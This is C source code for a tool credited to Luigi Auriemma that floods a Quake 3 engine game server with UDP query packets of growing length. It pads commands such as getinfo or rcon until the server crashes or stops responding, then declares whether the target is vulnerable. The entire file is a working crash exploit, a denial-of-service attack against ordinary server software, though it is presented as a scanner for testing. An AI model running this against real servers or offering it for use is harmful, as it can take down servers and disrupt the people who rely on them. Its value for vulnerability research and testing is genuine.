/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif



#define VER         "0.1.2"
#define BUFFSZ      2048
#define TIMEOUT     2
#define INFO        "\xff\xff\xff\xff" "getstatus\n"
#define BOOM        "\xff\xff\xff\xff" "%s "



int send_recv(int sd, u_char *in, int inlen, u_char *out, int outlen, int bug);
void show_info(u_char *data);
int timeout(int sock);
u_int resolv(char *host);
void std_err(void);



struct  sockaddr_in peer;



int main(int argc, char *argv[]) {
    int     sd,
            i,
            slen,
            querylen,
            from  = 450,
            to    = 1200,
            jumps = 1;
    u_short port;
    u_char  bof[BUFFSZ + 1],
            buff[BUFFSZ + 1],
            *query = "getinfo",
            *p,
            chr = 'x';

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "Quake 3 engine infostring crash/shutdown scanner "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s [options] <server> <port>\n"
            "\n"
            "Options:\n"
            "-f FROM   start the scan from byte FROM (default %d)\n"
            "-t TO     finish the scan at byte TO (default %d)\n"
            "-j JUMPS  the number of bytes to increment for each scan.\n"
            "          Default value is %d, means that if the scan starts from %d it will\n"
            "          send %s followed by %d bytes, then %d, %d, %d and so on\n"
            "-q QUERY  sends a custom query instead of %s, possible choices are:\n"
            "          getstatus, getinfo, getchallenge, connect, ipAuthorize, rcon,\n"
            "          disconnect\n"
            "-c CHAR   the character you want to use for filling the big query (%c)\n"
            "\n", argv[0],
            from,
            to,
            jumps, from,
            query, from, from + jumps, from + (jumps * 2), from + (jumps * 3),
            query,
            chr);
        exit(1);
    }

    argc -= 2;
    for(i = 1; i < argc; i++) {
        switch(argv[i][1]) {
            case 'f': from  = atoi(argv[++i]);  break;
            case 't': to    = atoi(argv[++i]);  break;
            case 'j': jumps = atoi(argv[++i]);  break;
            case 'q': query = argv[++i];        break;
            case 'c': chr   = argv[++i][0];     break;
            default: {
                printf("\nError: wrong command-line argument (%s)\n\n", argv[i]);
                exit(1);
                }
        }
    }

    port = atoi(argv[argc + 1]);
    peer.sin_addr.s_addr = resolv(argv[argc]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    fputs("- request informations:\n", stdout);
    send_recv(sd, INFO, sizeof(INFO) - 1, buff, BUFFSZ, 0);
    show_info(buff);

    printf("- %s crash/shutdown scan:\n\n", query);
    querylen = sprintf(bof, BOOM, query);
    p = bof + querylen;
    to -= querylen;

    if(from > to) from = to;
    for(i = 0; i < from; i++) *p++ = chr;
    slen = p - bof;

    for(;;) {
        printf("  packet length:   %d\r", slen);

        if(send_recv(sd, bof, slen, buff, BUFFSZ, 1) < 0) break;

        slen += jumps;
        if((slen - querylen) > to) {
            slen -= jumps;
            break;
        } else if(slen > BUFFSZ) {
            printf("\n\n- max local buffer size (%d) reached", BUFFSZ);
            slen -= jumps;
            break;
        }
        for(i = 0; i < jumps; i++) *p++ = chr;
    }

    printf("\n\n- last packet sent was %d bytes (size of data = %d)",
        slen, slen - querylen);

    fputs("\n- check server:\n", stdout);
    sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer));
    if(timeout(sd) < 0) {
        fputs("\nServer IS vulnerable!!!\n\n", stdout);
    } else {
        fputs("\nServer doesn't seem vulnerable\n\n", stdout);
    }
    close(sd);
    return(0);
}



int send_recv(int sd, u_char *in, int inlen, u_char *out, int outlen, int bug) {
    int     retry;

    for(retry = 3; retry; retry--) {
        sendto(sd, in, inlen, 0, (struct sockaddr *)&peer, sizeof(peer));
        if(!timeout(sd)) break;
    }
    if(!retry) {
        if(bug) return(-1);
        fputs("\nError: socket timeout, no reply received\n\n", stdout);
        exit(1);
    }
    outlen = recvfrom(sd, out, outlen, 0, NULL, NULL);
    if(outlen < 0) std_err();
    out[outlen] = 0;

    return(outlen);
}



void show_info(u_char *data) {
    int     nt = 1;
    u_char  *p;

    for(;;) {
        p = strchr(data, '\\');
        if(p) *p = 0;

        if(nt & 1) {
            printf("%s\n", data);
        } else {
            printf("%30s: ", data);
        }

        if(!p) break;

        data = p + 1;
        nt++;
    }
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


